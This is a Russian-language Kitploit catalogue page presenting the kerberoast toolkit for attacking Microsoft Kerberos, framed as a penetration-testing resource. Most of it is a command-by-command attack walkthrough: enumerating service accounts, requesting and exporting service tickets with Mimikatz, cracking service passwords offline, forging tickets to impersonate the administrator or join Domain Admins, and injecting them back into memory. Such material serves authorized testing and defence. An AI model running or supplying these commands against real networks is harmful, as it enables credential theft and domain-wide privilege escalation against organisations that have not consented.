Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
kerberoast — Инструментарий для атаки на реализации MS Kerberos: извлечение учетных записей SPN, запрос и экспорт билетов, взлом паролей служб, перезапись билетов для олицетворения и повышения привилегий. | Kitploit
Инструменты/GitHubGitHub/nidem/kerberoast
Атаки на ПаролиЭксплуатацияТестирование на ПроникновениеАутентификация
GitHubnidem/kerberoast

kerberoast

Инструментарий для атаки на реализации MS Kerberos: извлечение учетных записей SPN, запрос и экспорт билетов, взлом паролей служб, перезапись билетов для олицетворения и повышения привилегий.

Репозиторий
1.5k31273 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

kerberoast

Kerberoast — это набор инструментов для атаки на реализации MS Kerberos. Ниже приведён краткий обзор того, что делает каждый инструмент.

Извлечение всех учётных записей, используемых в качестве SPN, с помощью встроенных средств MS

root@kitploit:~
PS C:\> setspn -T medin -Q */*

Запрос билет(-ов)

Один билет:

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  

Все билеты

root@kitploit:~
PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

Извлечение полученных билетов из ОЗУ с помощью Mimikatz

root@kitploit:~
mimikatz # kerberos::list /export

Взлом с помощью tgsrepcrack

root@kitploit:~
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Перезапись

Сделать так, чтобы пользователь выглядел как другой пользователь

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  

Добавить пользователя в другую группу (в данном случае — Domain Admin)

root@kitploit:~
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  

Внедрение обратно в ОЗУ с помощью Mimikatz

root@kitploit:~
kerberos::ptt sql.kirbi
Скачать инструмент